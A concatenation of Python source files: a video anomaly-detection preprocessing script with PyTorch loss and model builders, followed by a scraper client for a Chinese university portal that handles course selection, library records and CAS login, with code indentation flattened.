final_path = original_path / 'objects'
# temp_folder = './temp'
if not os.path.exists(final_path):
os.makedirs(final_path)
final = dict()
with open(time_file, 'r') as f:
temp = json.load(f)
det_results = sorted(os.listdir(detection_path))
pbar = tqdm(range(len(det_results)))
# count = 0
for frame_det in det_results:
pbar.set_description('Processing: {}'.format(frame_det))
video_name = '_'.join(frame_det.split('.')[0].split('_')[0:-1])
image_name = frame_det.split('.')[0].split('_')[-1]
npy_file = detection_path / frame_det
detections = np.load(npy_file)
finals = _produce_detection(detections[0], detections[1], detections[2], detections[3], detections[7])
# finals = _produce_detection(detections[0])
for index, det in enumerate(finals):
if det[4] <= det_threshold:
continue
current_frame = frame_det.split('.')[0]
back_frame = temp[current_frame]['back']
front_frame = temp[current_frame]['front']
# object_c = _crop_det_cv2(images_path / video_name / (image_name + '.jpg'), det)
# object_b = _crop_det_cv2(images_path / video_name / (back_frame + '.jpg'), det)
# object_f = _crop_det_cv2(images_path / video_name / (front_frame + '.jpg'), det)
# back_gradient_x, back_gradient_y = image_gradient(object_b.unsqueeze_(0).unsqueeze_(0))
# back_gradient = torch.cat([back_gradient_x, back_gradient_y], dim=1).squeeze_(0)
# front_gradient_x, front_gradient_y = image_gradient(object_f.unsqueeze_(0).unsqueeze_(0))
# front_gradient = torch.cat([front_gradient_x, front_gradient_y], dim=1).squeeze_(0)
# import ipdb; ipdb.set_trace()
final[frame_det.split('.')[0] + '#' +str(index)] = dict()
final[frame_det.split('.')[0] + '#' +str(index)]['box'] = det
final[frame_det.split('.')[0] + '#' +str(index)]['current_frame'] = video_name + '/' + image_name + '.jpg'
final[frame_det.split('.')[0] + '#' +str(index)]['back_frame'] = video_name + '/' + back_frame + '.jpg'
final[frame_det.split('.')[0] + '#' +str(index)]['front_frame'] = video_name + '/' + front_frame + '.jpg'
# count += 1
pbar.update(1)
# if count > 20:
# break
# import ipdb; ipdb.set_trace()
try:
final_name = final_path / (split + '_' + verbose + '.pt')
torch.save(final, final_name)
except Exception as err:
print(err)
if __name__ == '__main__':
# path = '/export/home/chengyh/reproduce/objec-centric/data/VAD/testing/frames'
# path_objects = '/export/home/chengyh/reproduce/objec-centric/data/VAD/'
path_objects = '/export/home/chengyh/reproduce/objec-centric/data/SHTech/'
# decide_back_front(path)
# make_objects_db(path_objects, split='training', det_threshold=0.6, time_file='./training_3.json', verbose='det0.6_cascade_grad')
make_objects_box_db(path_objects, split='testing', det_threshold=0.4, time_file='./testing_3.json', verbose='det0.4_cascade_only_box')
# make_global_db(path_objects)
```
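The back/front bookkeeping in `decide_back_front` clamps indices at the clip boundaries. A tiny self-contained illustration of the same rule for a hypothetical five-frame clip and `duration=3`:

```python
frames = ['000', '001', '002', '003', '004']
duration = 3
for index in range(len(frames)):
    back = frames[0] if index - duration <= 0 else frames[index - duration]
    front = frames[-1] if index + duration >= len(frames) else frames[index + duration]
    print(index, back, front)   # e.g. index 0 -> ('000', '003'), index 4 -> ('001', '004')
```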
#### File: lib/loss/build_loss.py
```python
from .build.abstract import LossBuilder
class LossAPI(LossBuilder):
def __init__(self, cfg, logger):
super(LossAPI, self).__init__(cfg)
self.logger = logger
def __call__(self):
loss_dict, loss_lamada = super(LossAPI, self).build()
self.logger.info(f'the loss names:{loss_dict.keys()}')
self.logger.info(f'the loss lamada:{loss_lamada}')
return loss_dict, loss_lamada
```
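A hedged call sketch for the loss builder; the concrete loss functions and their weights come from the `cfg` consumed by `LossBuilder`, which is not shown here, and `cfg` itself is assumed to exist.

```python
import logging

loss_api = LossAPI(cfg, logging.getLogger('loss'))
loss_dict, loss_lamada = loss_api()   # dict of loss callables plus their weights, keys set by the config
```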
#### File: networks/build/abstract.py
```python
from .modelcatalog import ModelCatalog
class ModelBuilder(object):
def __init__(self, cfg):
self.cfg = cfg
def build(self):
model = ModelCatalog.get(self.cfg.MODEL.name, self.cfg)
return model
```
#### File: lib/networks/build_model.py
```python
from .build.abstract import ModelBuilder
from collections import OrderedDict
import torch
from colorama import init,Fore
init(autoreset=True)
class ModelAPI(ModelBuilder):
def __init__(self, cfg, logger):
# self.model_name = cfg.MODEL.name
super(ModelAPI, self).__init__(cfg)
self.logger = logger
def __call__(self):
model = super(ModelAPI, self).build()
self.logger.info('the name is ' + Fore.RED + f'{self.cfg.MODEL.name}')
if isinstance(model, OrderedDict):
self.logger.info('The model is an' + Fore.RED + ' OrderedDict')
message = 'The model keys are: '
for key in model.keys():
temp = Fore.RED + str(key) + Fore.GREEN + ','
message += temp
self.logger.info(message)
elif isinstance(model, torch.nn.Module):
self.logger.info('The model is an ' + Fore.RED + 'nn.Module')
else:
raise Exception('Unsupported model type')
return model
``` |
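A minimal sketch of building a model through the API, assuming `cfg.MODEL.name` points at a registered catalog entry; the result is either an `OrderedDict` of sub-networks (as in the OCAE setup above) or a single `nn.Module`.

```python
import logging

model_api = ModelAPI(cfg, logging.getLogger('model'))   # `cfg` assumed to exist
model = model_api()
if isinstance(model, dict):
    sub_nets = list(model.keys())   # e.g. ['A', 'B', 'C', 'Detector'] for the object-centric model
```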
{
"source": "jokerwho/newzf",
"score": 3
} |
#### File: zfnweb/api/choose.py
```python
from bs4 import BeautifulSoup
import re
import time
import requests
import json
from urllib import parse
from requests import exceptions
with open('config.json', mode='r', encoding='utf-8') as f:
config = json.loads(f.read())
class Xuanke(object):
def __init__(self, base_url, cookies, year, term):
self.base_url = base_url
self.headers = {
'Referer': base_url,
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'
}
self.cookies = cookies
if config["proxy"] == "none":
self.proxies = None
else:
self.proxies = {
'http': config["proxy"]
}
# self.nowyear = str(int(time.strftime("%Y", time.localtime())) - 1)
# self.nowterm = config["nowterm"]
self.nowyear = year
self.nowterm = term
def get_choosed(self):
"""获取已选课程信息"""
try:
choosed_url = parse.urljoin(self.base_url, '/xsxk/zzxkyzb_cxZzxkYzbChoosedDisplay.html?gnmkdm=N253512')
data = {
'xkxnm': self.nowyear,
'xkxqm': self.nowterm
}
try:
res = requests.post(choosed_url, data=data, headers=self.headers, cookies=self.cookies,
proxies=self.proxies, timeout=3)
except exceptions.Timeout as e:
return {'err': 'Connect Timeout'}
jres = res.json()
res_dict = {
'courseNumber': len(jres),  # number of selected courses
'items': [{
'courseTitle': i.get("kcmc"),
'courseCategory': i.get("kklxmc"),
'teacher': (re.findall(r"/(.*?)/", i.get("jsxx")))[0],
'teacher_id': (re.findall(r"(.*?\d+)/", i.get("jsxx")))[0],
'classId': i.get("jxb_id"),
'classVolume': int(i.get("jxbrs")),
'classPeople': int(i.get("yxzrs")),
'courseRoom': (i.get("jxdd").split('<br/>'))[0] if '<br/>' in i.get("jxdd") else i.get("jxdd"),
'courseId': i.get("kch"),
'doId': i.get("do_jxb_id"),
'courseTime': (i.get("sksj").split('<br/>'))[0] + '、' + (i.get("sksj").split('<br/>'))[1] if '<br/>' in i.get(
"sksj") else i.get("sksj"),
'credit': float(i.get("xf")),
'chooseSelf': int(i.get("zixf")),
'waiting': i.get("sxbj")
} for i in jres]
}
return res_dict
except Exception as e:
print(e)
def get_bkk_list(self, bkk):
"""获取板块课选课列表"""
try:
"""获取head_data"""
sessions = requests.Session()
url_data1 = parse.urljoin(self.base_url, '/xsxk/zzxkyzb_cxZzxkYzbIndex.html?gnmkdm=N253512&layout=default')
data1 = sessions.get(url_data1, headers=self.headers, cookies=self.cookies, proxies=self.proxies,
timeout=3)
data1.encoding = data1.apparent_encoding
soup = BeautifulSoup(data1.text, 'html.parser')
gotCredit_list = []
for gotCredit_content in soup.find_all('font', color=re.compile('red')):
gotCredit_list.append(gotCredit_content)
gotCredit = gotCredit_list[2].string
kklxdm_list = []
xkkz_id_list = []
for tab_content in soup.find_all('a', role=re.compile('tab')):
onclick_content = tab_content.get('onclick')
r = re.findall(r"'(.*?)'", str(onclick_content))
kklxdm_list.append(r[0].strip())
xkkz_id_list.append(r[1].strip())
tab_list = [('bkk1_kklxdm', kklxdm_list[0]), ('bkk2_kklxdm', kklxdm_list[1]),
('bkk3_kklxdm', kklxdm_list[2]), ('bkk1_xkkz_id', xkkz_id_list[0]),
('bkk2_xkkz_id', xkkz_id_list[1]), ('bkk3_xkkz_id', xkkz_id_list[2])]
tab_dict = dict(tab_list)
data1_list = []
for data1_content in soup.find_all('input', type=re.compile('hidden')):
name = data1_content.get('name')
value = data1_content.get('value')
data1_list.append((str(name), str(value)))
data1_dict = dict(data1_list)
data1_dict.update(gotCredit=gotCredit)
data1_dict.update(tab_dict)
url_data2 = parse.urljoin(self.base_url, '/xsxk/zzxkyzb_cxZzxkYzbDisplay.html?gnmkdm=N253512')
data2_data = {
'xkkz_id': data1_dict["bkk" + bkk + "_xkkz_id"],
'xszxzt': '1',
'kspage': '0'
}
data2 = sessions.post(url_data2, headers=self.headers, data=data2_data, cookies=self.cookies,
proxies=self.proxies, timeout=3)
data2.encoding = data2.apparent_encoding
soup2 = BeautifulSoup(data2.text, 'html.parser')
data2_list = []
for data2_content in soup2.find_all('input', type=re.compile('hidden')):
name = data2_content.get('name')
value = data2_content.get('value')
data2_list.append((str(name), str(value)))
data2_dict = dict(data2_list)
data1_dict.update(data2_dict)
# print(data2_dict)
head_data = data1_dict
"""获取课程列表"""
url_kch = parse.urljoin(self.base_url, '/xsxk/zzxkyzb_cxZzxkYzbPartDisplay.html?gnmkdm=N253512')
url_bkk = parse.urljoin(self.base_url, '/xsxk/zzxkyzb_cxJxbWithKchZzxkYzb.html?gnmkdm=N253512')
kch_data = {
'bklx_id': head_data["bklx_id"],
'xqh_id': head_data["xqh_id"],
'zyfx_id': head_data["zyfx_id"],
'njdm_id': head_data["njdm_id"],
'bh_id': head_data["bh_id"],
'xbm': head_data["xbm"],
'xslbdm': head_data["xslbdm"],
'ccdm': head_data["ccdm"],
'xsbj': head_data["xsbj"],
'xkxnm': self.nowyear,
'xkxqm': self.nowterm,
'kklxdm': head_data["bkk" + bkk + "_kklxdm"],
'kkbk': head_data["kkbk"],
'rwlx': head_data["rwlx"],
'kspage': '1',
'jspage': '10'
}
kch_res = sessions.post(url_kch, headers=self.headers, data=kch_data, cookies=self.cookies,
proxies=self.proxies, timeout=3)
jkch_res = kch_res.json()
bkk_data = {
'bklx_id': head_data["bklx_id"],
'xkxnm': self.nowyear,
'xkxqm': self.nowterm,
'xkkz_id': head_data["bkk" + bkk + "_xkkz_id"],
'xqh_id': head_data["xqh_id"],
'zyfx_id': head_data["zyfx_id"],
'njdm_id': head_data["njdm_id"],
'bh_id': head_data["bh_id"],
'xbm': head_data["xbm"],
'xslbdm': head_data["xslbdm"],
'ccdm': head_data["ccdm"],
'xsbj': head_data["xsbj"],
'kklxdm': head_data["bkk" + bkk + "_kklxdm"],
'kch_id': jkch_res["tmpList"][0]["kch_id"],
'kkbk': head_data["kkbk"],
'rwlx': head_data["rwlx"],
'zyh_id': head_data["zyh_id"]
}
bkk_res = sessions.post(url_bkk, headers=self.headers, data=bkk_data, cookies=self.cookies,
proxies=self.proxies, timeout=3)
jbkk_res = bkk_res.json()
if bkk != '3' and (len(jkch_res["tmpList"]) != len(jbkk_res)):
res_dict = {'err': 'Error Length'}
return res_dict
list1 = jkch_res["tmpList"]
list2 = jbkk_res
for i in range(0, len(list1)):
list1[i].update(list2[i])
res_dict = {
'courseNumber': len(list1),
'items': [{
'courseTitle': j.get("kcmc"),
'teacher': (re.findall(r"/(.*?)/", j.get("jsxx")))[0],
'teacher_id': (re.findall(r"(.*?\d+)/", j.get("jsxx")))[0],
'classId': j.get("jxb_id"),
'doId': j.get("do_jxb_id"),
'kklxdm': head_data["bkk" + bkk + "_kklxdm"],
'classVolume': int(j.get("jxbrl")),
'classPeople': int(j.get("yxzrs")),
'courseRoom': (j.get("jxdd").split('<br/>'))[0] if '<br/>' in j.get("jxdd") else j.get("jxdd"),
'courseId': j["kch_id"],
'courseTime': (j.get("sksj").split('<br/>'))[0] + '、' + (j.get("sksj").split('<br/>'))[1] if '<br/>' in j.get(
"sksj") else j.get("sksj"),
'credit': float(j.get("xf")),
} for j in list1]
}
return res_dict
except Exception as e:
print(e)
def choose(self, doId, kcId, gradeId, majorId, kklxdm):
url_choose = parse.urljoin(self.base_url, '/xsxk/zzxkyzb_xkBcZyZzxkYzb.html?gnmkdm=N253512')
sess = requests.Session()
choose_data = {
'jxb_ids': str(doId),
'kch_id': str(kcId),
# 'rwlx': '3',
# 'rlkz': '0',
# 'rlzlkz': '1',
# 'sxbj': '1',
# 'xxkbj': '0',
# 'cxbj': '0',
'qz': '0',
# 'xkkz_id': '9B247F4EFD6291B9E055000000000001',
'xkxnm': self.nowyear,
'xkxqm': self.nowterm,
'njdm_id': str(gradeId),
'zyh_id': str(majorId),
'kklxdm': str(kklxdm),
# 'xklc': '1',
}
isOk = sess.post(url_choose, headers=self.headers, data=choose_data, cookies=self.cookies, proxies=self.proxies,
timeout=3)
result = isOk.json()
return result
def cancel(self, doId, kcId):
url_cancel = parse.urljoin(self.base_url, '/xsxk/zzxkyzb_tuikBcZzxkYzb.html?gnmkdm=N253512')
sess = requests.Session()
cancel_data = {
'jxb_ids': str(doId),
'kch_id': str(kcId),
'xkxnm': self.nowyear,
'xkxqm': self.nowterm,
}
isOk = sess.post(url_cancel, headers=self.headers, data=cancel_data, cookies=self.cookies, proxies=self.proxies,
timeout=3)
result = re.findall(r"(\d+)", isOk.text)[0]
return result
```
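A hedged sketch of driving the client: the cookies must come from an earlier login, and the base URL, year and term values below are placeholders rather than real endpoints or credentials.

```python
import requests

cookies = requests.utils.cookiejar_from_dict({'JSESSIONID': 'xxx', 'route': 'xxx'})  # placeholders
xk = Xuanke(base_url='http://jw.example.edu.cn/', cookies=cookies, year='2020', term='3')
choosed = xk.get_choosed()         # {'courseNumber': ..., 'items': [...]} or {'err': 'Connect Timeout'}
electives = xk.get_bkk_list('1')   # block-course list for tab 1; {'err': 'Error Length'} on a mismatch
```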
#### File: zfnweb/api/portal_library.py
```python
from bs4 import BeautifulSoup
import re
import time
import requests
import json
import traceback
from urllib import parse
class Personal(object):
def __init__(self, cookies):
self.login_url = 'http://ids.xcc.edu.cn/authserver/login?service=http%3A%2F%2Fopac.xcc.edu.cn%3A8080%2Freader%2Fhwthau.php'
self.st_url = ''
self.index_url = 'http://opac.xcc.edu.cn:8080/reader/redr_info.php'
self.info_url = 'http://opac.xcc.edu.cn:8080/reader/redr_info_rule.php'
self.booklist_url = 'http://opac.xcc.edu.cn:8080/reader/book_lst.php'
self.bookhist_url = 'http://opac.xcc.edu.cn:8080/reader/book_hist.php'
self.bookdetail_url = 'http://opac.xcc.edu.cn:8080/opac/item.php?marc_no='
self.paylist_url = 'http://opac.xcc.edu.cn:8080/reader/account.php'
self.paydetail_url = 'http://opac.xcc.edu.cn:8080/reader/fine_pec.php'
self.sess = requests.Session()
self.cookies = {'PHPSESSID':cookies['PHPSESSID']}
self.req = ''
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 Edg/83.0.478.54',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}
def get_info(self):
try:
index_req = self.sess.get(self.index_url, headers=self.headers,cookies=self.cookies,proxies={'http':'http://172.16.17.32:2589'},timeout=5)
index_soup = BeautifulSoup(index_req.text, 'lxml')
access_list = []
for a in index_soup.find_all(class_="bigger-170"):
access_list.append(a.get_text())
max_borrow = access_list[0].strip()
max_order = access_list[1].strip()
max_trust = access_list[2].strip()
percent = index_soup.find(class_="Num").get_text()
info_req = self.sess.get(self.info_url, headers=self.headers,cookies=self.cookies,proxies={'http':'http://172.16.17.32:2589'},timeout=5)
info_soup = BeautifulSoup(info_req.text,'lxml')
table = info_soup.find('div',{'id':"mylib_info"})
info_list = []
for i in range(0,9):
tr = table.find_all('tr')[i]
values = re.findall(r':(.*)',tr.text)
for j in values:
info_list.append(j)
res = {
'name':info_list[0],
'license_start':info_list[4],
'license_work':info_list[5],
'license_end':info_list[3],
'max_borrow':max_borrow,
'max_order':max_order,
'max_trust':max_trust,
'overdue':index_soup.find_all('span',class_='infobox-data-number')[0].get_text(),
'type':info_list[9],
'level':info_list[10],
'since':info_list[11],
'breaks':info_list[12],
'break_money':info_list[13],
'sex':info_list[20],
'deposit':info_list[27],
'charge':info_list[28],
'percent':percent
}
return res
except Exception:
traceback.print_exc()
def book_list(self):
try:
booklist_req = self.sess.get(self.booklist_url, headers=self.headers,cookies=self.cookies,proxies={'http':'http://172.16.17.32:2589'},timeout=5)
booklist_soup = BeautifulSoup(booklist_req.text,'lxml')
if booklist_soup.find(class_='iconerr') is not None:
return {'err':"当前无借阅"}
table = booklist_soup.find('table')
trs = table.find_all('tr')
res = {
'now': booklist_soup.find('div',id='mylib_content').find('p',style='margin:10px auto;').find_all('b')[0].get_text().strip(),
'max': booklist_soup.find('div',id='mylib_content').find('p',style='margin:10px auto;').find_all('b')[1].get_text().strip(),
'list':[{
'barcode':trs[i].find_all('td')[0].get_text(),
'book_name':trs[i].find_all('td')[1].a.get_text(),
'marc_no':trs[i].find_all('td')[1].a["href"][25:],
'bdate':trs[i].find_all('td')[2].get_text(),
'sdate':trs[i].find_all('td')[3].get_text().strip(),
'cnum':trs[i].find_all('td')[4].get_text(),
'location':trs[i].find_all('td')[5].get_text()
}for i in range(1,len(trs))]
}
return res
except Exception:
traceback.print_exc()
def book_hist(self):
try:
bookhist_req = self.sess.post(self.bookhist_url, headers=self.headers,cookies=self.cookies,data={'para_string':"all"},proxies={'http':'http://172.16.17.32:2589'},timeout=5)
bookhist_soup = BeautifulSoup(bookhist_req.text,'lxml')
if bookhist_soup.find(class_='iconerr') is not None:
return {'err':"无历史借阅"}
table = bookhist_soup.find('table')
trs = table.find_all('tr')
res = [{
'index':trs[i].find_all('td')[0].get_text(),
'barcode':trs[i].find_all('td')[1].get_text(),
'book_name':trs[i].find_all('td')[2].a.get_text(),
'marc_no':trs[i].find_all('td')[2].a["href"][25:],
'author':trs[i].find_all('td')[3].get_text(),
'start_time':trs[i].find_all('td')[4].get_text(),
'back_time':trs[i].find_all('td')[5].get_text(),
'location':trs[i].find_all('td')[6].get_text()
}for i in range(1,len(trs))]
return res
except Exception:
traceback.print_exc()
def paylist(self):
try:
paylist_req = self.sess.post(self.paylist_url, headers=self.headers,cookies=self.cookies,proxies={'http':'http://172.16.17.32:2589'},timeout=5)
paylist_soup = BeautifulSoup(paylist_req.text, 'lxml')
if paylist_soup.find(class_='iconerr') is not None:
return {'err':"无账目清单"}
table = paylist_soup.find('table')
trs = table.find_all('tr')
sta = "".join(trs[len(trs)-1].find_all('td')[0].get_text().strip().split())
res = {
'sta':sta[sta.find(':')+1:][:sta[sta.find(':')+1:].find('(')],
'list':[{
'date':trs[i].find_all('td')[0].get_text().strip(),
'type':trs[i].find_all('td')[1].get_text().strip(),
'bm':trs[i].find_all('td')[2].get_text().strip(),
'sm':trs[i].find_all('td')[3].get_text().strip(),
'way':trs[i].find_all('td')[4].get_text().strip(),
'bill':trs[i].find_all('td')[5].get_text().strip()
}for i in range(1,len(trs)-1)]
}
return res
except Exception:
traceback.print_exc()
def paydetail(self):
try:
paydetail_req = self.sess.post(self.paydetail_url, headers=self.headers,cookies=self.cookies,proxies={'http':'http://172.16.17.32:2589'},timeout=5)
paydetail_soup = BeautifulSoup(paydetail_req.text, 'lxml')
# status = 1
for i in paydetail_soup.find_all(class_='iconerr'):
# if "违章记录" not in i.get_text():
# # status = 0
# return {'err':"有违章记录,请联系管理员"}
if "欠款记录为空" in i.get_text():
# status = 0
return {'err':"无缴费记录"}
table = paydetail_soup.find('h2',text='欠款信息').find_next_sibling()
trs = table.find_all('tr')
res = [{
'barcode':trs[i].find_all('td')[0].get_text().strip(),
'position':trs[i].find_all('td')[1].get_text().strip(),
'book_name':trs[i].find_all('td')[2].a.get_text().strip(),
'marc_no':trs[i].find_all('td')[2].a["href"][25:],
'author':trs[i].find_all('td')[3].get_text().strip(),
'bd':trs[i].find_all('td')[4].get_text().strip(),
'sd':trs[i].find_all('td')[5].get_text().strip(),
'location':trs[i].find_all('td')[6].get_text().strip(),
'sp':trs[i].find_all('td')[7].get_text().strip(),
'ap':trs[i].find_all('td')[8].get_text().strip(),
'sta':trs[i].find_all('td')[9].get_text().strip()
}for i in range(1,len(trs))]
return res
except Exception:
traceback.print_exc()
class Search(object):
def __init__(self):
self.search_url = 'http://opac.xcc.edu.cn:8080/opac/openlink.php?onlylendable=yes&'
self.bookdetail_url = 'http://opac.xcc.edu.cn:8080/opac/item.php?marc_no='
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 Edg/83.0.478.54',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}
def search_book(self,type,content,page):
try:
search_result_req = requests.get(self.search_url + type + "=" + content + "&page=" + page, headers=self.headers,proxies={'http':'http://172.16.17.32:2589'},timeout=5)
search_result_soup = BeautifulSoup(search_result_req.text,'lxml')
mainbox = search_result_soup.find('div',id='content')
num = mainbox.find('strong',class_='red').get_text()
search_list = mainbox.find('ol',id='search_book_list').find_all('li')
try:
pages = mainbox.find('span',class_='num_prev').find('font',color='black').get_text()
except:
pages = "1"
res = {
'type': type,
'content': content,
'num': num,
'page': page,
'pages': pages,
'list': [{
'type': search_list[i].h3.span.get_text(),
'title': search_list[i].h3.a.get_text()[search_list[i].h3.a.get_text().find('.')+1:],
'author': [text.strip() for text in search_list[i].p.find_all(text=True) if text.parent.name !='span' and text.strip()][0],
'code': [text.strip() for text in search_list[i].h3.find_all(text=True) if text.parent.name !='span' and text.parent.name != 'a' and text.strip()][0],
'publish': "".join([text.strip() for text in search_list[i].p.find_all(text=True) if text.parent.name !='span' and text.strip()][1].split()),
'marc_no': search_list[i].h3.a['href'][17:],
'status': re.findall(r':(\d*)',search_list[i].p.span.get_text())
}for i in range(0,len(search_list))]
}
return res
except Exception:
traceback.print_exc()
def book_detail(self,marc_no):
try:
bookdetail_req = requests.get(self.bookdetail_url + marc_no, headers=self.headers,proxies={'http':'http://172.16.17.32:2589'},timeout=5)
bookdetail_soup = BeautifulSoup(bookdetail_req.text,'lxml')
bookdetail_info = bookdetail_soup.find(id='item_detail')
bookdetail_status = bookdetail_soup.find('table',id='item')
dls = bookdetail_info.find_all('dl')
trs = bookdetail_status.find_all('tr')
res = {'isbn':[],'author_oth':[]}
for i in range(0,len(dls)):
if "题名/责任者" in dls[i].dt.get_text():
res['title'] = dls[i].dd.a.get_text()
res['hole'] = dls[i].dd.get_text()
if "出版发行项" in dls[i].dt.get_text():
res['imprint'] = dls[i].dd.get_text()
if "ISBN及定价" in dls[i].dt.get_text():
res['isbn'].append(dls[i].dd.get_text())
if "载体形态项" in dls[i].dt.get_text():
res['physical'] = dls[i].dd.get_text()
if "其它题名" in dls[i].dt.get_text():
res['title_oth'] = dls[i].dd.a.get_text()
if dls[i].dt.get_text() == "个人责任者:":
res['author'] = dls[i].dd.a.get_text()
if dls[i].dt.get_text() == "个人次要责任者:":
res['author_oth'].append(dls[i].dd.a.get_text())
if "学科主题" in dls[i].dt.get_text():
res['category'] = dls[i].dd.get_text()
if "中图法分类号" in dls[i].dt.get_text():
res['position'] = dls[i].dd.a.get_text()
if "一般附注" in dls[i].dt.get_text():
res['notes'] = dls[i].dd.get_text()
if "责任者附注" in dls[i].dt.get_text():
res['author_notes'] = dls[i].dd.get_text()
if "提要文摘附注" in dls[i].dt.get_text():
res['contents'] = dls[i].dd.get_text()
res['status'] = [{
'position':trs[j].find_all('td')[0].get_text(),
'code':trs[j].find_all('td')[1].get_text(),
'date':"".join(trs[j].find_all('td')[2].get_text().split()),
'library':trs[j].find_all('td')[3].get_text().strip(),
'about':trs[j].find_all('td')[3].get('title'),
'now':trs[j].find_all('td')[4].get_text(),
}for j in range(1,len(trs))]
return res
except Exception:
traceback.print_exc()
```
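`Search` needs no cookies; below is a sketch of the expected call shape. The request only succeeds from the campus network, and `'title'` is assumed here to be one of the OPAC search fields.

```python
s = Search()
page1 = s.search_book(type='title', content='Python', page='1')
# page1 -> {'num': ..., 'pages': ..., 'list': [{'title': ..., 'marc_no': ..., 'status': ...}, ...]}
detail = s.book_detail(page1['list'][0]['marc_no'])
```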
#### File: zfnweb/api/portal_login.py
```python
from bs4 import BeautifulSoup
import re
import time
import requests
import json
import traceback
from urllib import parse
class PLogin(object):
def __init__(self):
self.login_url = 'http://ids.xcc.edu.cn/authserver/login?service=http%3A%2F%2Fportal.xcc.edu.cn%2Findex.portal'
self.library_url = 'http://ids.xcc.edu.cn/authserver/login?service=http%3A%2F%2Fopac.xcc.edu.cn%3A8080%2Freader%2Fhwthau.php'
self.st_url = ''
self.index_url = 'http://portal.xcc.edu.cn/index.portal'
self.sess = requests.Session()
self.cookies = ''
self.req = ''
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 Edg/83.0.478.54',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}
def plogin(self, username, password):
try:
req = self.sess.get(self.login_url, headers=self.headers,proxies={'http':'http://192.168.3.11:2589'},timeout=5)
soup = BeautifulSoup(req.text, 'lxml')
lt = soup.find('input',{"name":"lt"}).get("value")
# print('lt:'+lt)
execution = soup.find('input',{"name":"execution"}).get("value")
# print('execution:'+execution)
eventId = soup.find('input',{"name":"_eventId"}).get("value")
# print('eventId:'+eventId)
self.cookies = self.sess.cookies
login_data = {
'username': username,
'password': password,
'lt': lt,
'execution': execution,
'_eventId': eventId,
'rmShown': "1"
}
self.req = self.sess.post(self.login_url, headers=self.headers,cookies=self.cookies,
data=login_data,allow_redirects=False)
JSESSIONID = requests.utils.dict_from_cookiejar(self.cookies)["JSESSIONID"]
try:
CASTGC = requests.utils.dict_from_cookiejar(self.cookies)["CASTGC"]
except Exception as e:
return {'err':"用户名或密码错误"}
self.st_url = self.req.headers['Location']
self.sess.get(self.st_url)
return {'JSESSIONID':JSESSIONID,'CASTGC':CASTGC}
except Exception:
traceback.print_exc()
def login(self, username, password):
try:
req = self.sess.get(self.login_url, headers=self.headers,proxies={'http':'http://192.168.3.11:2589'},timeout=5)
soup = BeautifulSoup(req.text, 'lxml')
lt = soup.find('input',{"name":"lt"}).get("value")
# print('lt:'+lt)
execution = soup.find('input',{"name":"execution"}).get("value")
# print('execution:'+execution)
eventId = soup.find('input',{"name":"_eventId"}).get("value")
# print('eventId:'+eventId)
self.cookies = self.sess.cookies
login_data = {
'username': username,
'password': password,
'lt': lt,
'execution': execution,
'_eventId': eventId,
'rmShown': "1"
}
self.req = self.sess.post(self.login_url, headers=self.headers,cookies=self.cookies,
data=login_data,allow_redirects=False,
proxies={'http':'http://192.168.3.11:2589'},timeout=5)
JSESSIONID = requests.utils.dict_from_cookiejar(self.cookies)["JSESSIONID"]
try:
CASTGC = requests.utils.dict_from_cookiejar(self.cookies)["CASTGC"]
except Exception as e:
return {'err':"用户名或密码错误"}
self.st_url = self.req.headers['Location']
self.sess.get(self.st_url,proxies={'http':'http://192.168.3.11:2589'},timeout=5)
# library cookies part
self.req = self.sess.post(self.library_url, headers=self.headers,cookies=self.cookies,allow_redirects=False,proxies={'http':'http://192.168.3.11:2589'},timeout=5)
self.st_url = self.req.headers['Location']
ST = parse.urlparse(self.st_url).query[7:]
self.sess.get(self.st_url,proxies={'http':'http://192.168.3.11:2589'},timeout=5)
return {'JSESSIONID':JSESSIONID,'CASTGC':CASTGC,'PHPSESSID':ST}
except Exception:
traceback.print_exc()
```
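A hedged login sketch; the student number and password are placeholders, and a wrong password surfaces as `{'err': ...}` rather than an exception.

```python
p = PLogin()
cookies = p.login('2018xxxxxx', 'password-placeholder')
if cookies and 'err' not in cookies:
    print(sorted(cookies))   # ['CASTGC', 'JSESSIONID', 'PHPSESSID']
```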
#### File: zfnweb/choose/views.py
```python
import datetime
import os
import time
import json
import requests
from api import Xuanke, Login
from django.http import HttpResponse
from info.models import Students
from mp.models import Config
from info.views import update_cookies
with open('config.json', mode='r', encoding='utf-8') as f:
config = json.loads(f.read())
base_url = config["base_url"]
def index(request):
return HttpResponse('choose_index here')
def cacheData(xh, filename):
docurl = 'data/' + str(xh)[0:2] + '/' + str(xh) + '/'
fileurl = docurl + str(filename) + '.json'
if not os.path.exists(docurl):
os.makedirs(docurl)
else:
if not os.path.exists(fileurl):
return
else:
with open(fileurl, mode='r', encoding='utf-8') as o:
result = json.loads(o.read())
return result
def newData(xh, filename, content):
docurl = 'data/' + str(xh)[0:2] + '/' + str(xh) + '/'
fileurl = docurl + str(filename) + '.json'
if not os.path.exists(docurl):
os.makedirs(docurl)
with open(fileurl, mode='w', encoding='utf-8') as n:
n.write(content)
else:
with open(fileurl, mode='w', encoding='utf-8') as n:
n.write(content)
# if not os.path.exists(fileurl):
# with open(fileurl, mode='w', encoding='utf-8') as n:
# n.write(content)
def writeLog(content):
date = datetime.datetime.now().strftime('%Y-%m-%d')
filename = 'mylogs/' + date + '.log'
if not os.path.exists(filename):
with open(filename, mode='w', encoding='utf-8') as n:
n.write('【%s】的日志记录' % date)
with open(filename, mode='a', encoding='utf-8') as l:
l.write('\n%s' % content)
def login_pages_set(xh):
lgn = Login(base_url=base_url)
